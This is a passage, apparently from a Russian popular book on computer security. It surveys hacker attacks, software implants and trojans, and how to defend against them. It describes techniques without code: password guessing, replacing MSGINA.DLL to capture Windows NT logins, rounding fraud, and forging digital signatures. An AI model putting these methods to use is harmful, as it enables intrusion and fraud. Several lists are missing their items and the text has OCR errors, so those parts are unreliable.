Главарь приказал по рации всем участникам операции приготовиться к проведению ее заключительной фазы. "Первый готов, второй готов, третий готов" — понеслось в ответ. "Поехали!" — послышалась команда главаря. По этой команде дюжие охранники окружили дом: им было приказано никого не впускать и не выпускать без письменного разрешения с подписью главаря, заверенной нотариусом.
Семь смертоносных программ-вирусоносителей устремились по телефонным линиям в атаку на главный сервер банка. Банковские программы защиты были сначала парализованы, а потом полностью смяты превосходящими силами противника. Вырвавшиеся на оперативный простор вирусы учинили в компьютерной сети банка настоящий дебош.
Получив сигнал о проникновении вирусов, главный сервер компьютерной сети банка отключил все коммуникации. В результате город остался без тепла, воды и электричества.
Пока поднятые по тревоге сотрудники отдела безопасности банка торговались, сколько им заплатят за срочность, а потом вылавливали расплодившиеся вирусы, прошли почти сутки. За это время в московской квартире, в которой осуществлялся взлом, были уничтожены все следы пребывания компьютерных взломщиков.
Прямой ущерб, понесенный банком из-за не прохождения платежей, составил сотни тысяч долларов. А заказчикам взлом компьютерной зашиты банка обошелся всего в 20 тыс. фальшивых долларов.
В заключение можно заметить, что зарубежным банкирам еще повезло, что операция прошла успешно, и для заметания следов совершенною преступления компьютерным взломщикам не пришлось воспользоваться услугами своего агента в ракетно-космических войсках.
Компьютер глазами хакера
В деловом мире наконец-то признали важность решения проблемы защиты компьютерных данных. Громкие процессы, связанные с проникновением злоумышленников в корпоративные компьютерные системы, особенно дели Левина, названное Интерполом самым серьезным транснациональным сетевым компьютерным преступлением, в результате которого американский Сити-банк потерял 400 тыс. долларов, привлекли пристальное внимание не только специалистов в области компьютерной обработки данных, но и директоров компаний. Последние пусть с опозданием, но все-таки поняли. что с пуском в эксплуатацию каждой новой компьютерной системы, имеющей выход в глобальную компьютерную сеть Internet, они рискуют распахнуть перед злоумышленниками всех мастей (профессиональными взломщиками и грабителями, обиженными подчиненными или ничем не брезгующими конкурентами) окно, через которое те могут беспрепятственно проникать в святая святых компании и наносить существенный материальный ущерб. В результате как неосведомленность руководителей, так и бюджетные ограничения теперь не являются основными препятствиями на пути внедрения мер защиты информации в компьютерных системах, а главную роль играет выбор конкретных инструментов и решений.
Выяснилось, что создание хорошо защищенной компьютерной системы невозможно без тщательного анализа потенциальных угроз для ее безопасности. Специалисты составили перечень действий, которые нужно произвести в каждом конкретном случае, чтобы представлять сценарии возможных нападений на компьютерную систему. Этот перечень включал:
Таким образом, при проведении анализа потенциальных угроз безопасности компьютерной системы эксперт ставил себя на место злоумышленника, пытающегося проникнуть в эту систему. А для этого ему необходимо было понять, что представляет собой злоумышленник, от которого требуется защищаться. И в первую очередь нужно было как можно точнее ответить на следующие вопросы:
Однако экспертам, которым приходилось ставить себя на место злоумышленника, чтобы ответить на перечисленные выше вопросы, очень не понравилось именоваться злоумышленниками. Во-первых, это слово — длинное и неуклюжее, а во-вторых, оно не совсем адекватно отражает суть решаемой задачи, которая состоит не в нахождении брешей в защите компьютерной системы, а в их ликвидации. Поэтому они взяли на вооружение другой термин, который более точно соответствует возложенной на них миссии, и стали разрабатывать сценарии поведения так называемых хакеров.
Кто такие хакеры
Хотя последнее время термин хакер можно довольно часто встретить на страницах компьютерной прессы, у пользующихся им людей до сих пор не сложилось единого мнения о том, кого именно следует именовать хакером. Часто хакером называют любого высококлассного специалиста в области вычислительной техники и всего, что с ней связано. Однако среди журналистов, затрагивающих тему хакерства, имеются серьезные разногласия относительно того, как хакеры применяют свои уникальные познания на практике.
Одни предлагают называть хакером лишь того, кто пытается взломать защиту компьютерных систем, чтобы затем выдать обоснованные рекомендации по улучшению их защитных механизмов, другие — именовать хакером высококвалифицированного специалиста, который взламывает компьютеры исключительно в преступных целях. Чтобы не ввязываться в полемику, которая в основном касается нравственно-этической стороны деятельности хакеров, для начала назовем хакером любого человека, стремящегося обойти защиту компьютерной системы, вне зависимости от того, преследуются ли по закону его действия. При этом основной целью хакера является получение дополнительных привилегий и прав доступа к компьютерной системе. По отношению к атакуемой им компьютерной системе хакер может быть:
Статистика компьютерных преступлений свидетельствует о том. что уровень профессиональной подготовки хакера варьируется в очень широких пределах. Хакером может стать даже школьник, случайно обнаруживший программу взлома на одном из специализированных хакерских серверов и сети Internet. В то же время отмечено и появление настоящих хакерских банд. главарями которых являются компьютерные специалисты высочайшей квалификации.
В дальнейшем под хакером будет пониматься только высоко квалифицированный специалист, поскольку именно его действия представляют наибольшую угрозу безопасности компьютерных систем. Для такого хакера характерны следующие черты и особенности поведения:
В общем случае программное обеспечение любой универсальной компьютерной системы состоит из трех основных компонентов: операционной системы, сетевого программного обеспечения (СПО) и системы управления базами данных (СУБД). Поэтому все попытки взлома защиты компьютерных систем можно разделить на три группы:
Атаки на уровне систем управления базами данных
Защита СУБД является одной из самых простых задач. Это связано с тем, что СУБД имеют строго определенную внутреннюю структуру, и операции над элементами СУБД заданы довольно четко. Есть четыре основных действия — поиск, вставка, удаление и замена элемента. Другие операции являются вспомогательными и применяются достаточно редко. Наличие строгой структуры и четко определенных операций упрощает решение задачи защиты СУБД. В большинстве случаев хакеры предпочитают взламывать защиту компьютерной системы на уровне операционной системы и получать доступ к файлам СУБД с помощью средств операционной системы. Однако в случае, если используется СУБД, не имеющая достаточно надежных защитных механизмов, или плохо протестированная версия СУБД, содержащая ошибки, или если при определении политики безопасности администратором СУБД были допущены ошибки, то становится вполне вероятным преодоление хакером защиты, реализуемой на уровне СУБД.
Кроме того, имеются два специфических сценария атаки на СУБД, для защиты от которых требуется применять специальные методы. В первом случае результаты арифметических операций над числовыми полями СУБД округляются в меньшую сторону, а разница суммируется в некоторой другой записи СУБД (как правило, эта запись содержит личный счет хакера в банке, а округляемые числовые поля относятся к счетам других клиентов банка). Во втором случае хакер получает доступ к полям записей СУБД, для которых доступной является только статистическая информация. Идея хакерской атаки на СУБД — так хитро сформулировать запрос, чтобы множество записей, для которого собирается статистика, состояло только из одной записи.
Атаки на уровне операционной системы
Защищать операционную систему, в отличие от СУБД, гораздо сложнее. Дело в том, что внутренняя структура современных операционных систем чрезвычайно сложна, и поэтому соблюдение адекватной политики безопасности является значительно более трудной задачей. Среди людей несведующих бытует мнение, что самые эффективные атаки на операционные cистемы могут быть организованы только с помощью сложнейших средств, основанных на самых последних достижениях науки и техники, а хакер должен быть программистом высочайшей квалификации. Это не совсем так.
Никто не спорит с тем, что пользователю следует быть в курсе всех новинок в области компьютерной техники. Да и высокая квалификация — совсем не лишнее. Однако искусство хакера состоит отнюдь не в том, чтобы взламывать любую самую "крутую" компьютерную защиту. Нужно просто суметь найти слабое место в конкретной системе защиты. При этом простейшие методы взлома оказываются ничуть не хуже самых изощренных, поскольку чем проще алгоритм атаки, тем больше вероятность ее завершения без ошибок и сбоев, особенно если возможности предварительного тестирования этого алгоритма в условиях, приближенных к "боевым", весьма ограничены
Успех реализации того или иного алгоритма хакерской атаки на практике в значительной степени зависит от архитектуры и конфигурации конкретной операционной системы, являющейся объектом этой атаки. Однако имеются атаки, которым может быть подвергнута практически любая операционная система:
- подглядывание за пользователем, когда тот вводит пароль, дающий право на работу с операционной системой (даже если во время ввода пароль не высвечивается на экране дисплея, хакер может легко у шип, пароль, просто следя за перемещением пальцев пользователя по клавиатуре);
- получение пароля из файла, в котором этот пароль был сохранен пользователем, не желающим затруднять себя вводом пароля при подключении к сети (как правило, такой пароль хранится в файле в незашифрованном виде);
- поиск пароля, который пользователи, чтобы не забыть, записывают па календарях, в записных книжках или на оборотной стороне компьютерных клавиатур (особенно часто подобная ситуация встречается, если администраторы заставляют пользователей применять трудно запоминаемые пароли);
- кража внешнего носителя парольной информации (дискеты или электронного ключа, на которых хранится пароль пользователя, предназначенный для входа в операционную систему);
- полный перебор всех возможных вариантов пароля;
- подбор пароля по частоте встречаемости символов и биграмм, с помощью словарей наиболее часто применяемых паролей, с привлечением знаний о конкретном пользователе — его имени, фамилии, номера телефона, даты рождения и т. д., с использованием сведений о существовании эквивалентных паролей, при этом из каждого класса опробуется всего один пароль, что может значительно сократить время перебора;
- запуск программы от имени пользователя, имеющего необходимые полномочия, или в качестве системной программы (драйвера, сервиса, демона и т. д.);
- подмена динамически загружаемой библиотеки, используемой системными программами, или изменение переменных среды, описывающих путь к таким библиотекам;
- модификация кода или данных подсистемы защиты самой операционной системы;
- захват ресурсов (хакерская программа производит захват всех имеющихся в операционной системе ресурсов, а затем входит в бесконечный цикл);
- бомбардировка запросами (хакерская программа постоянно направляет операционной системе запросы, реакция на которые требует привлечения значительных ресурсов компьютера);
- использование ошибок в программном обеспечении или администрировании.
Если в программном обеспечении компьютерной системы нет ошибок и ее администратор строго соблюдает политику безопасности, рекомендованную разработчиками операционной системы, то атаки всех перечисленных пики, малоэффективны. Дополнительные меры, которые должны быть предприняты для повышения уровня безопасности, в значительной степени зависят от конкретной операционной системы, под управлением которой работаем данная компьютерная система. Тем не менее, приходится признать, что вне зависимости от предпринятых мер полностью устранить угрозу взлома компьютерной системы на уровне операционной системы невозможно. Поэтому политика обеспечения безопасности должна проводиться так, чтобы, даже преодолев защиту, создаваемую средствами операционной системы, хакер не смог нанести серьезного ущерба.
Атаки на уровне сетевого программного обеспечения
СПО является наиболее уязвимым, потому что канал связи, по которому передаются сообщения, чаше всего не защищен, и всякий, кто может иметь доступ к этому каналу, соответственно, может перехватывать сообщения и отправлять свои собственные. Поэтому на уровне СПО возможны следующие хакерские атаки:
Поскольку хакерские атаки на уровне СПО спровоцированы открытостью сетевых соединений, разумно предположить, что дли отражения этих атак необходимо максимально защитить каналы связи и тем самым затруднить обмен информацией по сети для тех, кто не является легальным пользователем. Ниже перечислены некоторые способы такой защиты:
Защита системы от взлома
Перечисленные выше методы хакерской атаки на компьютерную систему являются наиболее типичными и описаны в общей форме. Самые распространенные из этих методов будут рассмотрены ниже более подробно, поскольку их применение в конкретных случаях имеет свои особенности, которые требуют применения дополнительных защитных мер. А пока для обобщенной модели взлома компьютерных систем можно сформулировать универсальные правила, которых следует придерживаться, чтобы свести риск к минимуму.
Глава 2. Программы-шпионы
Программные закладки
Современная концепция создания компьютерных систем предполагает использование программных средств различного назначения в едином комплексе. К примеру, типовая система автоматизированного документооборота состоит из операционной среды, программных средств управления базами данных, телекоммуникационных программ, текстовых редакторов, антивирусных мониторов, средств для криптографической защиты данных, а также средств аутентификации и идентификации пользователей. Главным условием правильного функционирования такой компьютерной системы является обеспечение защиты от вмешательства в процесс обработки информации тех программ, присутствие которых в компьютерной системе не обязательно. Среди подобных программ, в первую очередь, следует упомянуть компьютерные вирусы. Однако имеются вредоносные программы еще одного класса. От них, как и от вирусов, следует с особой тщательностью очищать свои компьютерные системы. Это так называемые программные закладки, которые могут выполнять хотя бы одно из перечисленных ниже действий:
Программные закладки можно классифицировать и по методу их внедрения в компьютерную систему:
Чтобы программная закладка могла произвести какие-либо действия по отношению к другим программам или по отношению к данным, процессор должен приступить к исполнению команд, входящих в состав кода программной закладки. Это возможно только при одновременном соблюдении следующих условий:
Интересно, что иногда сам пользователь провоцируется на запуск исполняемого файла, содержащего код программной закладки. Известен такой случай. Среди пользователей свободно распространялся набор из архивированных файлов. Для извлечения файлов из него требовалось вызвать специальную утилиту, которая, как правило, есть почти у каждого пользователя и запускается после указания ее имени в командной строке. Однако мало кто из пользователей замечал, что в полученном наборе файлов уже имелась программа с таким же именем и .что запускаюсь именно она. Кроме разархивирования файлов, эта программная закладка дополнительно производила ряд действий негативного характера.
С учетом замечания о том, что программная закладка должна быть обязательно загружена в оперативную память компьютера, можно выделить резидентные закладки (они находятся в оперативной памяти постоянно, начиная с некоторого момента и до окончания сеанса работы компьютера, т. с. до его перезагрузки или до выключения питания) и нерезидентные (такие закладки попадают в оперативную память компьютера аналогично резидентным, однако, в отличие от последних, выгружаются по истечении некоторого времени или при выполнении особых условий).
Существуют три основные группы деструктивных действий, которые могут осуществляться программными закладками:
У всех программных закладок (независимо от метода их внедрения в компьютерную систему, срока их пребывания в оперативной памяти и назначения) имеется одна важная общая черта: они обязательно выполняют операцию записи в оперативную или внешнюю память системы. При отсутствии данной операции никакого негативного влияния программная закладка оказать не может. Ясно, что для целенаправленного воздействия она должна выполнять и операцию чтения, иначе в ней может быть реализована только функция разрушения (например, удаление или замена информации в определенных секторах жесткого диска).
Модели воздействия программных закладок на компьютеры
Перехват
В модели перехват программная закладка внедряется в ПЗУ. системное или прикладное программное обеспечение и сохраняет всю или выбранную информацию, вводимую с внешних устройств компьютерной системы или выводимую на эти устройства, в скрытой области памяти локальной или удаленной компьютерной системы. Объектом сохранения, например, могут служить символы, введенные с клавиатуры (все повторяемые два раза последовательности символов), или электронные документы, распечатываемые на принтере.
Данная модель может быть двухступенчатой. На первом этапе сохраняются только, например, имена или начала файлов. На втором накопленные данные анализируются злоумышленником с целью принятия решения о конкретных объектах дальнейшей атаки.
Модель типа "перехват" может быть эффективно использована при атаке на защищенную операционную систему Windows NT. После старта Windows NT на экране компьютерной системы появляется приглашение нажать клавиши <Ctrl>+<Alt>+<Del>. После их нажатия загружается динамическая библиотека MSGINA.DLL, осуществляющая прием вводимого пароля и выполнение процедуры его проверки (аутентификации). Описание всех функций этой библиотеки можно найти в файле Winwlx.h. Также существует простой механизм замены исходной библиотеки MSGINA.DLL на пользовательскую (для этого необходимо просто добавить специальную строку в реестр операционной системы Windows NT и указать местоположение пользовательской библиотеки). В результате злоумышленник может модифицировать процедуру контроля за доступом к компьютерной системе, работающей под управлением Windows NT.
Искажение
В модели искажение программная закладка изменяет информацию, которая записывается в память компьютерной системы в результате работы программ, либо подавляет/инициирует возникновение ошибочных ситуаций в компьютерной системе.
Можно выделить статическое и динамическое искажение. Статическое искажение происходит всего один раз. При этом модифицируются параметры программной среды компьютерной системы, чтобы впоследствии в ней выполнялись нужные злоумышленнику действия. К статическому искажению относится, например, внесение изменений в файл AUTOEXEC.BAT операционной системы Windows 95/98, которые приводят к запуску заданной программы, прежде чем будут запущены все другие, перечисленные в этом файле.
Специалистам российского Федерального агентства правительственной связи и информации (ФАПСИ) удалось выявить при анализе одной из отечественных систем цифровой подписи интересное статистическое искажение Злоумышленник (сотрудник отдела информатизации финансовой организации, в которой была внедрена данная система) исправил в исполняемом ЕХЕ-модуле программы проверки правильности цифровой подписи символьную строку "ПОДПИСЬ НЕКОРРЕКТНА" на символьную строку "ПОДПИСЬ КОРРЕКТНА". В результате вообще перестали фиксироваться документы с неверными цифровыми подписями, и, следовательно, в электронные документы стало можно вносить произвольные изменения уже после их подписания электронной цифровой подписью.
Динамическое искажение заключается в изменении каких-либо параметром системных или прикладных процессов при помощи заранее активизированных закладок. Динамическое искажение можно условно разделить так: искажение на входе (когда на обработку попадает уже искаженный документ) и искажение на выходе (когда искажается информация, отображаемая для восприятия человеком, или предназначенная для работы других программ).
Практика применения цифровой подписи в системах автоматизированного документооборота показала, что именно программная реализация цифровой подписи особенно подвержена влиянию программных закладок типа "динамическое искажение", которые позволяют осуществлять проводки фальшивых финансовых документов и вмешиваться в процесс разрешения споров по фактам неправомерного применения цифровой подписи. Например, в одной из программных реализаций широко известной криптосистемы PGP электронный документ, под которым требовалось поставить цифровую подпись, считывался блоками по 512 байт, причем процесс считывания считался завершенным, если в прочитанном блоке данные занимали меньше 512 байт. Работа одной программной закладки, выявленной специалистами ФАПСИ, основывалась на навязывании длины файла. Эта закладка позволяла считывать только первые 512 байт документа, и в результате цифровая подпись определялась на основе только этих 512 байт. Такая же схема действовала и при проверке поставленной под документом цифровой подписи. Следовательно, оставшаяся часть этого документа могла быть произвольным образом искажена, и цифровая подпись под ним продолжала оставаться "корректной".
Существуют 4 основных способа воздействия программных закладок на цифровую подпись:
В рамках модели "искажение" также реализуются программные закладки. действие которых основывается на инициировании или подавлении сигнала о возникновении ошибочных ситуаций в компьютерной системе, т. е. тех, которые приводят к отличному от нормального завершению исполняемой программы (предписанного соответствующей документацией).
Для инициирования статической ошибки на устройствах хранения информации создается область, при обращении к которой (чтение, запись, форматирование и т. п.) возникает ошибка, что может затруднить или блокировать некоторые нежелательные для злоумышленника действия системных пли прикладных программ (например, не позволять осуществлять корректно уничтожить конфиденциальную информацию на жестком диске).
При инициировании динамической ошибки для некоторой операции генерируется ложная ошибка из числа тех ошибок, которые могут возникать при выполнении данной операции. Например, для блокирования приема или передачи информации в компьютерной системе может постоянно инициироваться ошибочная ситуация "МОДЕМ ЗАНЯТ". Или при прочтении первого блока информации длиной 512 байт может устанавливаться соответствующий флажок для того, чтобы не допустить прочтения второго и последующих блоков и в итоге подделать цифровую подпись под документом.
Чтобы маскировать ошибочные ситуации, злоумышленники обычно используют подавление статической или динамической ошибки. Целью такого подавления часто является стремление блокировать нормальное функционирование компьютерной системы или желание заставить ее неправильно работать. Чрезвычайно важно, чтобы компьютерная система адекватно реагировала на возникновение всех без исключения ошибочных ситуаций, поскольку отсутствие должной реакции на любую ошибку эквивалентно ее подавлению и может быть использовано злоумышленником. Известен случай успешной атаки пары аргентинских самолетов-торпедоносцев на английский эсминец "Шеффилд", закончившийся нанесением серьезных повреждений этому кораблю. Из-за ошибок в программном обеспечении установленная на нем система противовоздушной обороны не смогла выбрать цель, которую полагалось сбивать первой, поскольку атакующие самолеты летели слишком близко друг от друга.
Разновидностью искажения является также модель типа троянский конь. В этом случае программная закладка встраивается в постоянно используемое программное обеспечение и по некоторому активизирующему событию вызывает возникновение сбойной ситуации в компьютерной системе. Тем самым достигаются сразу две цели: парализуется ее нормальное функционирование, а злоумышленник, получив доступ к компьютерной системе для устранения неполадок, сможет, например, извлечь из нее информацию, перехваченную другими программными закладками. В качестве активизирующего события обычно используется наступление определенного момент;: времени, сигнал из канала модемной связи или состояние некоторых счетчиков (например, счетчика количества запусков программы).
Уборка мусора
Как известно, при хранении компьютерных данных на внешних носителях прямого доступа выделяется несколько уровней иерархии: сектора, кластеры и файлы. Сектора являются единицами хранения информации на аппаратном уровне. Кластеры состоят из одного или нескольких подряд идущих секторов. Файл — это множество кластеров, связанных по определенному закону.
Работа с конфиденциальными электронными документами обычно сводится к последовательности следующих манипуляций с файлами:
Для защиты конфиденциальной информации обычно используется шифрование. Основная угроза исходит отнюдь не от использования нестойких алгоритмов шифрования и "плохих" криптографических ключей (как это может показаться на первый взгляд), а от обыкновенных текстовых редакторов и баз данных, применяемых для создания и коррекции конфиденциальных документов!
Дело в том, что подобные программные средства, как правило, в процессе функционирования создают в оперативной или внешней памяти компьютерной системы временные копии документов, с которыми они работают. Естественно, все эти временные файлы выпадают из поля зрения любых программ шифрования и могут быть использованы злоумышленником для того, чтобы составить представление о содержании хранимых в зашифрованном виде конфиденциальных документов.
Важно помнить и о том, что при записи отредактированной информации меньшего объема в тот же файл, где хранилась исходная информация до начала сеанса ее редактирования, образуются так называемые "хвостовые" кластеры, в которых эта исходная информация полностью сохраняется. И тогда "хвостовые" кластеры не только не подвергаются воздействию программ шифрования, но и остаются незатронутыми даже средствами гарантированного стирания информации. Конечно, рано или поздно информация из "хвостовых" кластеров затирается данными из других файлов, однако по оценкам специалистов ФАПСИ из "хвостовых" кластеров через сутки можно извлечь до 85%, а через десять суток — до 25—40% исходной информации.
Пользователям необходимо иметь в виду и то, что команда удаления файла (DEL) операционной системы DOS2 не изменяет содержания файла, и оно может быть в любой момент восстановлено, если поверх него еще не был записан другой файл. Распространенные средства гарантированного стирания файлов предварительно записывают на его место константы или случайные числа и только после этого удаляют файл стандартными средствами DOS. Однако даже такие мощные средства оказываются бессильными против программных закладок, которые нацелены на то, чтобы увеличить количество остающихся в виде "мусора" фрагментов конфиденциальной информации. Например, программная закладка может инициировать статическую ошибку, пометив один или несколько кластеров из цепочки, входящей в файл, меткой "СБОЙНЫЙ". В результате при удалении файла средствами операционной системы или средствами гарантированного уничтожения та его часть, которая размещена в сбойных кластерах, останется нетронутой и впоследствии может быть восстановлена с помощью стандартных утилит.
Наблюдение и компрометация
Помимо перечисленных, существуют и другие модели воздействия программных закладок на компьютеры. В частности, при использовании модели типа наблюдение программная закладка встраивается в сетевое или телекоммуникационное программное обеспечение. Пользуясь тем, что подобное программное обеспечение всегда находится в состоянии активности, внедренная в него программная закладка может следить за всеми процессами обработки информации в компьютерной системе, а также осуществлять установку и удаление других программных закладок. Модель типа компрометация позволяет получать доступ к информации, перехваченной другими программными закладками. Например, инициируется постоянное обращение к такой информации, приводящее к росту соотношения сигнал/шум. А это, в свою очередь, значительно облегчает перехват побочных излучений данной компьютерной системы и позволяет эффективно выделять сигналы, сгенерированные закладкой типа "компрометация", из общего фона излучения, исходящего от оборудования.
Защита от программных закладок
Задача защиты от программных закладок может рассматриваться в трех принципиально различных вариантах:
При рассмотрении этих вариантов решение задачи защиты от программных закладок сходно с решением проблемы защиты компьютерных систем от вирусов. Как и в случае борьбы с вирусами, задача решается с помощью средств контроля за целостностью запускаемых системных и прикладных программ, а также за целостностью информации, хранимой в компьютерной системе и за критическими для функционирования системы событиями. Однако данные средства действенны только тогда, когда сами они не подвержены влиянию программных закладок, которые могут:
При этом чрезвычайно важно, чтобы включение средств контроля выполнялось до начала воздействия программной закладки либо когда контроль осуществлялся только с использованием программ управления, находящихся в ПЗУ компьютерной системы.
Защита от внедрения программных закладок
Универсальным средством защиты от внедрения программных закладок является создание изолированного компьютера. Компьютер называется изолированным, если выполнены следующие условия:
Для определения степени изолированности компьютера может использоваться модель ступенчатого контроля. Сначала проверяется, нет ли изменений в BIOS. Затем, если все в порядке, считывается загрузочный сектор диска и драйверы операционной системы, которые, в свою очередь, также анализируются на предмет внесения в них несанкционированных изменений. И наконец, с помощью операционной системы запускается драйвер контроля вызовов программ, который следит за тем, чтобы в компьютере запускались только проверенные программы.
Интересный метод борьбы с внедрением программных закладок может быть использован в информационной банковской системе, в которой циркулируют исключительно файлы-документы. Чтобы не допустить проникновения программной закладки через каналы связи, в этой системе не допускается прием никакого исполняемого кода. Для распознавания событий типа "ПОЛУЧЕН ИСПОЛНЯЕМЫЙ КОД" и "ПОЛУЧЕН ФАЙЛ-ДОКУМЕНТ" применяется контроль за наличием в файле запрещенных символов: файл признается содержащим исполняемый код, если в нем присутствуют символы, которые никогда не встречаются в файлах-документах.
Выявление внедренной программной закладки
Выявление внедренного кода программной закладки заключается в обнаружении признаков его присутствия в компьютерной системе. Эти признаки можно разделить на следующие два класса:
К качественным и визуальным признакам относятся ощущения и наблюдения пользователя компьютерной системы, который отмечает определенные отклонения в ее работе (изменяется состав и длины файлов, старые файлы куда-то пропадают, а вместо них появляются новые, программы начинают работать медленнее, или заканчивают свою работу слишком быстро, или вообще перестают запускаться). Несмотря на то что суждение о наличии признаков этого класса кажется слишком субъективным, тем не менее, они часто свидетельствуют о наличии неполадок в компьютерной системе и, в частности, о необходимости проведения дополнительных проверок присутствия программных закладок. Например, пользователи пакета шифрования и цифровой подписи "Криптоцентр" с некоторых пор стали замечать, что цифровая подпись под электронными документами ставится слишком быстро. Исследование, проведенное специалистами ФАПСИ, показало присутствие программной закладки, работа которой основывалась на навязывании длины файла. В другом случае тревогу забили пользователи пакета шифрования и цифровой подписи "Криптон", которые с удивлением отметили, что скорость шифрования по криптографическому алгоритму ГОСТ 28147-89 вдруг возросла более, чем в 30 раз. А в третьем случае программная закладка обнаружила свое присутствие в программе клавиатурного ввода тем, что пораженная ею программа перестала нормально работать.
Признаки, выявляемые с помощью средств тестирования и диагностики, характерны как для программных закладок, так и для компьютерных вирусов. Например, загрузочные закладки успешно обнаруживаются антивирусными программами, которые сигнализируют о наличии подозрительного кода в загрузочном секторе диска. С инициированием статической ошибки на дисках хорошо справляется Disk Doctor, входящий в распространенный комплект утилит Norton Utilities. А средства проверки целостности данных на диске типа Adinf позволяют успешно выявлять изменения, вносимые в файлы программными закладками. Кроме того, эффективен поиск фрагментов кода программных закладок по характерным для них последовательностям нулей и единиц (сигнатурам), а также разрешение выполнении только программ с известными сигнатурами.
Удаление внедренной программной закладки
Конкретный способ удаления внедренной программной закладки зависит от метода ее внедрения в компьютерную систему. Если это программно-аппаратная закладка, то следует перепрограммировать ПЗУ компьютера. Если это загрузочная, драйверная, прикладная, замаскированная закладка или закладка- имитатор, то можно заменить их на соответствующую загрузочную запись, драйвер, утилиту, прикладную или служебную программу, полученную от источника, заслуживающего доверия. Наконец, если это исполняемый программный модуль, то можно попытаться добыть его исходный текст, убрать из него имеющиеся закладки или подозрительные фрагменты, а затем заново откомпилировать.
Троянские программы
Троянской программой (троянцем, или троянским конем) называется:
Таким образом, троянская программа — это особая разновидность программной закладки. Она дополнительно наделена функциями, о существовании которых пользователь даже не подозревает. Когда троянская программа выполняет эти функции, компьютерной системе наносится определенный ущерб. Однако то, что при одних обстоятельствах причиняет непоправимый вред, при других— может оказаться вполне полезным. К примеру, программу, которая форматирует жесткий диск, нельзя назван. троянской, если она как раз и предназначена для его форматирования (как это делает команда format операционной системы DOS). Но если пользователь, выполняя некоторую программу, совершенно не ждет, что она отформатирует его винчестер, — это и есть самый настоящий троянец.
Короче говоря, троянской можно считать любую программу, которая втайне от пользователя выполняет какие-то нежелательные для него действия. Эти действия могут быть любыми — от определения регистрационных номеров программного обеспечения, установленного на компьютере, до составления списка каталогов на его жестком диске. А сама троянская программа может маскироваться под текстовый редактор, под сетевую утилиту или любую программу, которую пользователь пожелает установить на свой компьютер.
Откуда берутся троянские программы
Троянская программа — это плод труда программиста. Никаким другим способом создать ее невозможно. Программист, пишущий троянскую программу, прекрасно осознает, чего он хочет добиться, и в своих намерениях он всегда весьма далек от альтруизма.
Большинство троянских программ предназначено для сбора конфиденциальной информации. Их задача, чаще всего, состоит в выполнении действий, позволяющих получить доступ к данным, которые не подлежат широкой огласке. К таким данным относятся пользовательские пароли, регистрационные номера программ, сведения о банковских счетах и т. д. Остальные троянцы создаются для причинения прямого ущерба компьютерной системе, приводя ее в неработоспособное состояние.
К последним можно отнести, например, троянскую программу PC CYBORG, которая завлекала ничего не подозревающих пользователей обещаниями предоставить им новейшую информацию о борьбе с вирусом, вызывающим синдром приобретенного иммунодефицита (СПИД). Проникнув в компьютерную систему, PC CYBORG отсчитывала 90 перезагрузок этой системы, а затем прятала все каталоги на ее жестком диске и шифровала находящиеся там файлы.
Другая троянская программа называлась AOLGOLD. Она рассылалась по электронной почте в виде заархивированного файла. В сопроводительном письме, прилагавшемся к этому файлу, говорилось о том, что AOLGOLD предназначена для повышения качества услуг, которые предоставляет своим пользователям крупнейший американский Internet-провайдер America Online (AOL). Архив состоял из двух файлов, один из которых именовался INSTALL.BAT. Пользователь, запустивший INSTALL.BAT, рисковал стереть все файлы из каталогов С:\, C:\DOS, C:\WINDOWS и C:\WINDOWS\SYSTEM на своем жестком диске.
Подобного рода троянские программы, как правило, создаются подростками, которые хотя и одержимы страстью к разрушению, но не имеют глубоких познаний в программировании и поэтому не могут причинить существенный ущерб компьютерным системам, подвергшимся нападению созданных ими троянцев. Например, программа AOLGOLD стирала себя с жесткого диска, будучи запущена из любого другого дискового раздела за исключением С.
Другое дело — троянские программы, авторами которых являются профессиональные программисты, занимающиеся разработкой программного обеспечения в солидных фирмах. Троянцы, входящие в распространенные компьютерные приложения, утилиты и операционные системы, представляют значительно большую угрозу компьютерам, на которых они установлены. поскольку их действия носят не деструктивный характер, а имеют целью сбор конфиденциальной информации о системе. Обнаружить такие троянские программы удается, как правило, чисто случайно. А поскольку программное обеспечение, частью которого они являются, в большинстве случаев используется не только какой-то одной компанией, закупившей это программное обеспечение, но также на крупных Internet-серверах и, кроме того, распространяется через Internet, последствия могут оказаться самыми плачевными.
Случается и так, что троянцы встраиваются в некоторые утилиты программистами, не имеющими никакого отношения к разработке этих утилит. Па-пример, в дистрибутив сканера SATAN, предназначенный для установки на компьютеры с операционной системой Linux, распространявшийся через Internet, попала троянская программа, которая "обосновалась" в утилите fping. При первом же запуске модифицированной утилиты fping в файл /etc/passwd добавлялась запись для пользователя с именем suser, который в результате мог войти в Linux и тайно получить там полномочия администратора. Однако у автора этой троянской программы были явные пробелы в компьютерном образовании. В частности, он не знал некоторых нюансов хранения паролей в операционных системах семейства UNIX. В результате файл /etc/passwd был соответствующим образом изменен всего лишь на двух компьютерах, на которых был установлен этот испорченный дистрибутив сетевого анализатора SATAN для Linux.
Где обитают и как часто встречаются троянские программы
В настоящее время троянские программы можно отыскать практически где угодно. Они написаны для всех без исключения операционных систем и для любых платформ. Не считая случаев, когда троянские программы пишутся самими разработчиками программного обеспечения, троянцы распространяются тем же способом, что и компьютерные вирусы. Поэтому самыми подозрительными на предмет присутствия в них троянцев, в первую очередь, являются бесплатные и условно-бесплатные программы, скачанные из Internet, а также программное обеспечение, распространяемое на пиратских компакт-дисках.
Например, в январе 1999 г. было обнаружено, что популярная утилита TCP Wrapper, предназначенная для администрирования UNIX-систем и бесплатно распространяемая через Internet, на многих ftp-сайтах была заменена внешне похожей на нее программой, которая на самом деле являлась троянцем. После инсталляции он отправлял электронное сообщение по определенным внешним адресам, оповещая своего хозяина об успешном внедрении. Потом он ждал, пока будет установлено удаленное соединение с портом 421 зараженного им компьютера, и предоставлял привилегированные права доступа через этот порт.
Другая троянская программа распространялась среди пользователей AOL в виде вложения в письмо, рассылаемое по электронной почте. Открывшие это вложение заражали свой компьютер троянцем, который пытался найти пароль для подключения к AOL и в случае успеха шифровал его. а потом отсылал электронной почтой куда-то в Китай.
В настоящее время существует целый ряд троянских программ, которые можно совершенно свободно скачать, подключившись к глобальной компьютерной сети Internet. Наибольшую известность среди них получили троянцы Back Orifice, Net Bus и SubSeven. На Web-узле группы разработчиков Back Orifice, которая именует себя Cult of Dead Cow (Культ мертвой коровы), можно даже найти с десяток постеров, которые предназначены для рекламы ее последней разработки — троянца Back Orifice 2000.
